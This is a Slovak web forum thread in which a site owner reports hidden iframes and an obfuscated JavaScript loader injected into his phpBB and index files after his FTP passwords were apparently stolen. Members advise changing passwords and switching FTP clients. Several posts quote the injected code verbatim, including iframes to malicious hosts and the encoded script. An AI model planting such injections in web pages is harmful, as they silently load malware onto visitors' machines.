Stránka: 1 z 2
| [ Príspevkov: 34 ] | 1, 2 |
| Autor | Správa |
|---|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
Kód: echo "<iframe src=\"http://klaomta.com/?click=877723\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
ten kod sa mi objavuje na strankach, ku ktorym pristupujem cez ftp
uz som raz mal problemy s tym a je to tu zasa 
napadlo mi to teraz nejake podstranky phpBB fora ...
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
na dalsej mam Kód: <iframe src="http://inhouselabel.cn:8080/ts/in.cgi?pepsi40" width=125 height=125 style="visibility: hidden"></iframe>
proste nechapem ... napada to subory index.php a v phpBB aj lang_main.php
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
konkretny priklad ...
/forum/templates/subSilver/images/index.htm
Kód: <html> <head> <title>subSilver created by subBlue Design</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#FFFFFF" text="#000000"><iframe src="http://inhouselabel.cn:8080/ts/in.cgi?pepsi40" width=125 height=125 style="visibility: hidden"></iframe> <table width="100%" height="100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td align="center" valign="middle"><a href="http://www.subblue.com/" target="_new"><img src="created_by.jpg" width="400" height="300" border="0" alt="Created by subBlue Design" /></a></td> </tr> </table> </body> </html><iframe src="http://klaomta.com/?click=87C38D" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
dalsi Kód: <iframe src="http://superlottry.cn:8080/ts/in.cgi?pepsi41" width=125 height=125 style="visibility: hidden"></iframe>
|
|
Registrovaný: 01.05.05
Príspevky: 13412
Témy: 1494 | 1494
Bydlisko: Bratislava |
Prezi si vsetky subory a zmen si heslo na ftp, takto ti to tam bude vznikat neustale, ak samozrejme nema nejaku chybu webhotsing kde mas web. V takom pripade ich kontaktuj nech si s tym spravia poriadok.
_________________
Streacom DA2 | SilverStone Titanium SX800-LTI 800W | ASRock X299E-ITX/ac | Intel Core i9-9980XE & be quiet! Dark Rock TF | Kingston HyperX Impact 64 GB DDR4 2666 MHz | NVIDIA Titan RTX 24 GB | Intel SSD Optane 905P 480 GB NVMe U.2 & Intel SSD 750 1,2 TB NVMe U.2 & Intel SSD 660p 2 TB NVMe M.2 & Seagate BackUp Plus Portable 56 TB USB | 55" 4K OLED Dell Alienware AW5520QF | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech G603 | Logitech F710 | Harman Kardon Sabre SB 35 & Sennheiser RS 175 | Microsoft Windows 11 Enterprise | APC Back-UPS BE-850 VA | Lenovo ThinkPad X250 & Microsoft Windows 11 Professional | iPhone 15 Pro 256 GB & Pitaka Aramid | SilverStone ML05B Milo | Corsair SF600 SFX 600W | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 & NOCTUA NH-L12S | Kingston HyperX Savage 32 GB DDR4 2400 MHz | NVIDIA GeForce GT 710 1 GB | Intel SSD Optane Memory 32 GB NVMe M.2 & Intel SSD 730 240 GB SATA | Ubuntu 24.04.1 LTS |
|
Registrovaný: 24.01.08
Prihlásený: 13.09.17
Príspevky: 14572
Témy: 66 | 66
Bydlisko: Žilina |
pekný príklad problému s bezpečnosťou.. odporúčam pomeniť heslá (ale za poriadne, nie "jozo" za "fero"). A hentie odkazy z tých súborov samozrejme pomaž, nemá to tam čo robiť.
_________________
C#, PHP, ... |
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
ja mam hesla poriadne, moze mi vyrus napadnut total commander a vytiahnut z neho ulozene hesla ?
jedna sa o viacero stranok, na ktore sa napajam, idem pomenit tie hesla
|
|
Registrovaný: 24.01.08
Prihlásený: 13.09.17
Príspevky: 14572
Témy: 66 | 66
Bydlisko: Žilina |
pri pc to môže byť čokoľvek  ale, pokiaľ by si mal napadnutý TC, tak by si mal napadnutý pravdepodobne aj zvyšok pc... dobrý nápad je preskenovať pc 
_________________
C#, PHP, ... |
|
Registrovaný: 01.05.05
Príspevky: 13412
Témy: 1494 | 1494
Bydlisko: Bratislava |
dulius píše: ja mam hesla poriadne, moze mi vyrus napadnut total commander a vytiahnut z neho ulozene hesla ?
jedna sa o viacero stranok, na ktore sa napajam, idem pomenit tie hesla Ano, tento "vir" stiahne hesla z total commanderu a potom sa na tie stranky pripaja 
//ak tam mas velke mnozstvo ftp uctou, tak odporucam migrovat na total commander tusim 7.5, zatial je len beta, ale vsetky hesla si dokazes chranit jednym hlavnym heslom a hlavne ich vsade zmenit
_________________
Streacom DA2 | SilverStone Titanium SX800-LTI 800W | ASRock X299E-ITX/ac | Intel Core i9-9980XE & be quiet! Dark Rock TF | Kingston HyperX Impact 64 GB DDR4 2666 MHz | NVIDIA Titan RTX 24 GB | Intel SSD Optane 905P 480 GB NVMe U.2 & Intel SSD 750 1,2 TB NVMe U.2 & Intel SSD 660p 2 TB NVMe M.2 & Seagate BackUp Plus Portable 56 TB USB | 55" 4K OLED Dell Alienware AW5520QF | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech G603 | Logitech F710 | Harman Kardon Sabre SB 35 & Sennheiser RS 175 | Microsoft Windows 11 Enterprise | APC Back-UPS BE-850 VA | Lenovo ThinkPad X250 & Microsoft Windows 11 Professional | iPhone 15 Pro 256 GB & Pitaka Aramid | SilverStone ML05B Milo | Corsair SF600 SFX 600W | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 & NOCTUA NH-L12S | Kingston HyperX Savage 32 GB DDR4 2400 MHz | NVIDIA GeForce GT 710 1 GB | Intel SSD Optane Memory 32 GB NVMe M.2 & Intel SSD 730 240 GB SATA | Ubuntu 24.04.1 LTS |
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
oki, menim tie hesla, resp. docasne rusim vsetky ulozene hesla v TC ....
zapisujem si to, zatial ich budem pisat rucne ...
a pozriem na ten beta TC
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
aky program odporucate na preskenovanie PC ?
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
dalsie dristy, co sa mi dostali na web, pricom som sa tam uz nenapajal cez ftp ...
toto bolo v phpBB fore v index.php
Kód: <?php echo ''; ?><?php echo '<script type="text/javascript"></script>'; ?>
<iframe src="http://thebestwaytofind.cn:8080/index.php" width=163 height=125 style="visibility: hidden"></iframe> a toto v includes/auth.php Kód: <?php echo '<script language='JavaScript'>function e590206b977(){var w4=Array.prototype.slice.call(arguments).join(""),y4=w4.substr(3,3)-352,wf,o2,w4=w4.substr(6),s9=w4.length;for(var u1=0;u1<s9;u1++){try{throw(x0=w8(w4,u1));}catch(e){x0=e;};if(x0=='£'){y4="";u1=oc(u1);oe=u9(w4,u1);while(oe!='£'){y4+=oe;u1++;oe=x9(w4,u1);}y4-=303;continue;}wf="";if(x0=='µ'){u1++;x0=w4.substr(u1,1);while(x0!='µ'){wf+=x0;u1++;x0=w4.substr(u1,1);}wf=ob(wf,y4,6);if(wf<0)wf+=256;wf=rd(wf);document.write(String.fromCharCode(wf));continue;}p3=(x0+'').charCodeAt(0);if(p3>848)p3-=848;o2=p3-y4-6;if(o2<0)o2+=256;if(o2>=192)o2+=848;else if(o2==168)o2=1025;else if(o2==184)o2=1105;document.write(String.fromCharCode(o2));}}e590206b977("0d","7374Xebn£","502£µ14µµ26µ£","401","£µ173µµ1","36µµ18","7","µ£4","1","7","£Êµ1","87µ","µ","181µ","£396£µ1","33µË","×","×","Óµ157µµ146µ","µ146","µËÌ×","µ1","4","4µÖÈ£396£Ñ£3","99£Ê","Ë","Ø","£","438","£","µ","0","µ","µ1","8","7µðûµ","18","8","µ£3","2","1£","~","µ","12","9µµ1","34µ|£","3","7","7£","µ12","7µµ","185","µ","µ19","0µ~µ179","µµ","1","83µµ","1","85","µ£","348£r","eUS£","33","3","£","{mh","x","£433£","Ðŵ18","4µµ168µÐ£4","9","2","£µ","8","µ£454","£æ£3","3","9£","q","£4","72","£","÷","µ3µ","ìߣ478£","Õ£4","63£µ8µµ","21µµ24µ£3","4","2£","µ145µµ1","46","µ£","30","9£~I£","436","£","µ","173","µ£","33","8","£Y£411£","µ14","8µ","µ1","76µ","µ17","4µ","µ161µ","µ","1","87µ£","37","0£","µ1","43µµ","15","5µ","µ","138µµ","150µµ14","2µµ13","5µ");function w8(qa,te){return qa.substr(te,1);}function oc(t3){return ++t3;}function u9(s1,tf){return s1.substr(tf,1);}function x9(qe,x4){return qe.substr(x4,1);}function rd(xc){if(xc==168)xc=1025;else if(xc==184)xc=1105;return (xc>=192 && xc<256) ? xc+848 : xc;}function ob(t8,w5,u4){return t8-w5-u4;}</script>'; ?>
|
|
Registrovaný: 30.05.06
Prihlásený: 08.10.14
Príspevky: 1756
Témy: 35 | 35
Bydlisko: BA - WESTSIDE |
Ak používaš Total Commander, tak je to "známa vec" ( http://www.tipypropc.cz/total-commander-–-hesla-jako-na-dlani/ ), podľa všetkého však v najnovšej verzii odstránená. Bezpečnejší je napr. WinSCP.
_________________
A. S. Tanenbaum píše: The terms LF, MF, and HF refer to low, medium, and high frequency, respectively. Clearly, when the names were assigned, nobody expected to go above 10 MHz, so the higher bands were later named the Very, Ultra, Super, Extremely, and Tremendously High Frequency bands. Beyond that there are no names, but Incredibly, Astonishingly, and Prodigiously high frequency (IHF, AHF, and PHF) would sound nice. |
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
dikes, hesla som uz vymazal, skusim iny program ...
winSCP je urcite OK ?
|
|
Registrovaný: 23.05.08
Prihlásený: 11.01.14
Príspevky: 163
Témy: 3 | 3
Bydlisko: Rybany | |
Registrovaný: 24.01.08
Prihlásený: 13.09.17
Príspevky: 14572
Témy: 66 | 66
Bydlisko: Žilina |
no neviem čo môže mať z toho "článku" jasno... nie je tam vlastne nič vysvetlené a veta "ukladá heslá na disk, ale nie je problém ich dešifrovať" je výpovedná asi ako "windows nie je bezpečný operačný systém".. ostatní ftp klienti ukladajú snáď heslá na internet? proste laicky popísaný jeho dôvod, prečo prejsť na filezillu... mohol si vážne vybrať lepší príklad
_________________
C#, PHP, ... |
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
zase som nasiel nieco na index suboroch, hned za <body> bolo toto: Kód: <iframe src="http://thebestwaytofind.cn:8080/index.php" width=163 height=125 style="visibility: hidden"></iframe>
vymazal som to cez web ftp ... v total comanderi uz nemam ziadne hesla ...
tak uvidim .. ak to tam zajtra zasa bude, problem nebude v total comanderi, ale niekde inde, uvidime ...
|
|
|
Si zmen hesla preboha (len vymazanie hesiel z TC ti nepomoze )......... nechapem co riesis. A pouzivaj iny FTP klient ako total commander.
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
Ivan11114 píše: Si zmen hesla preboha (len vymazanie hesiel z TC ti nepomoze )......... nechapem co riesis. A pouzivaj iny FTP klient ako total commander. ja som si tie hesla zmenil pred 2 dnami, asi si necital co som tu pisal
teda nechapem co tu riesis ty,najskor si skus precitat co pisem a potom reaguj, dakujem.
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
ten winSCP, stale mi pise, ze cas pripojenia vyprsal, popripade timeout detected, could not retrieve directory listing
skusim iny program
edit: na inom PC mi vo winSCP napisalo to iste. a skusal som rozne ftp konta
|
|
Registrovaný: 24.01.08
Prihlásený: 13.09.17
Príspevky: 14572
Témy: 66 | 66
Bydlisko: Žilina |
odporúčam filezillu zdarma a žiadne podobné problémy..
_________________
C#, PHP, ... |
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
prave som siel napisat, ze som si ztiahol Filezilu a funguje
dik walther za odporucanie
|
|
Registrovaný: 24.01.08
Prihlásený: 13.09.17
Príspevky: 14572
Témy: 66 | 66
Bydlisko: Žilina |
paráda za týždeň daj vedieť, ako sa má stránka teraz už len dúfať, že to bolo naozaj len kvôli TC...
_________________
C#, PHP, ... |
|
Registrovaný: 23.05.08
Prihlásený: 11.01.14
Príspevky: 163
Témy: 3 | 3
Bydlisko: Rybany |
walther píše: no neviem čo môže mať z toho "článku" jasno... nie je tam vlastne nič vysvetlené a veta "ukladá heslá na disk, ale nie je problém ich dešifrovať" je výpovedná asi ako "windows nie je bezpečný operačný systém".. ostatní ftp klienti ukladajú snáď heslá na internet? proste laicky popísaný jeho dôvod, prečo prejsť na filezillu... mohol si vážne vybrať lepší príklad nieje tam o tom probleme vela popisane ale on sa pital na dalsie programi a tam ma hned spomenutu Filezilu
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
jj, dam vediet .. tu nejde len o jednu stranku, ale viacero, ktore boli napadnute evidentne asi cez ten moj TC .... uvidime
|
|
Registrovaný: 22.11.07
Príspevky: 1368
Témy: 22 | 22
Bydlisko: PD |
dulius píše: dikes, hesla som uz vymazal, skusim iny program ...
winSCP je urcite OK ? Je, pouzivam ho na SFTP a nie je problem.
_________________
Koreňom všetkého zla je nedostatok poznania. |
|
Registrovaný: 01.07.09
Prihlásený: 07.07.09
Príspevky: 8
Témy: 0 | 0 |
V novej verzii Total commandera je uz aj general password pre pristup k dalsim heslam, cize ciastocne to poriesili...
...problem nie je ani tak v total comanderi, a v tom ze hesla uklada na disk ) a...problem je medzi stolickou a pocitacom, ze si ten dotycny nevie udrzat svoje pc, cez ktore pristupuje k ftp ciste bez malware...nedodrziava zakladne pravidla bezpecnosti a pouziva aj nezname neoverene pc, napr. kamosovo ci v kaviarni atd...
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
blashkowitch píše: V novej verzii Total commandera je uz aj general password pre pristup k dalsim heslam, cize ciastocne to poriesili...
...problem nie je ani tak v total comanderi, a v tom ze hesla uklada na disk ) a...problem je medzi stolickou a pocitacom, ze si ten dotycny nevie udrzat svoje pc, cez ktore pristupuje k ftp ciste bez malware...nedodrziava zakladne pravidla bezpecnosti a pouziva aj nezname neoverene pc, napr. kamosovo ci v kaviarni atd...
ty chodis na internet do kaviarni , ku kamosom a podobne?
ja nie
file zilla funguje zatial bez problemov, na TC uz kaslem, nie je bezpecny.
|
|
Registrovaný: 01.07.09
Prihlásený: 07.07.09
Príspevky: 8
Témy: 0 | 0 |
dulius píše: ty chodis na internet do kaviarni , ku kamosom a podobne?
ja nie
file zilla funguje zatial bez problemov, na TC uz kaslem, nie je bezpecny.
...co dodat...bol to priklad...pokial sa na tvojich weboch objavuju skodlive iframe, a nie je to chyba poskytovatela/hostingu..tak si na vine ty, nedokladnym zabezpecenim svojho pc, ci nedokladnym zabezpecenim stranky...su len tieto dve moznosti )) Kazda system je len tak bezpecny, ako je bezpecny jeho uzivatel...a ten TC bol original? ci nejaky crack? ))) neverim, ze by si vyhodil len tak zakupeny produkt ) ved mas licenciu a vyuzi bezplatnu aktualizaciu...ciastocne to uz osetrili
|
|
Registrovaný: 20.01.07
Prihlásený: 12.02.24
Príspevky: 401
Témy: 87 | 87 |
blashkowitch píše: ...co dodat...bol to priklad...pokial sa na tvojich weboch objavuju skodlive iframe, a nie je to chyba poskytovatela/hostingu..tak si na vine ty, nedokladnym zabezpecenim svojho pc, ci nedokladnym zabezpecenim stranky...su len tieto dve moznosti )) Kazda system je len tak bezpecny, ako je bezpecny jeho uzivatel...a ten TC bol original? ci nejaky crack? ))) neverim, ze by si vyhodil len tak zakupeny produkt ) ved mas licenciu a vyuzi bezplatnu aktualizaciu...ciastocne to uz osetrili
mam tu free verziu, kde musim na zaciatku stlacat cisla 1,2,3 ... ale precitaj si po roznych forach, resp. aj na tomto fore, ze ten TC ma naozaj bezpecnostne diery, to potvrdili viaceri, ty mas asi iny nazor.
Tak preco ho mam pouzivat, ked mozem pouzit bezpecnejsi produkt? skus na to odpovedat.
inak ja viem, ze moj PC bol napadnuty, to je snad jasne, ked cez neho sa dostali tie skodliviny hore
|
|
Stránka: 1 z 2
| [ Príspevkov: 34 ] | 1, 2 |
|
